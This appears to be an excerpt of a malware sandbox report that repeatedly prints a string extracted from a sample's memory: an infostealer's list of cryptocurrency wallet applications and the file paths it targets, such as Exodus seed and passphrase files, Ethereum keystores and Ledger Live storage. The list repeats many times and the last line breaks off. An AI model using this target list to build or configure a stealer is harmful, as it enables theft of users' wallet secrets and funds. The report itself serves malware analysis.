Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia 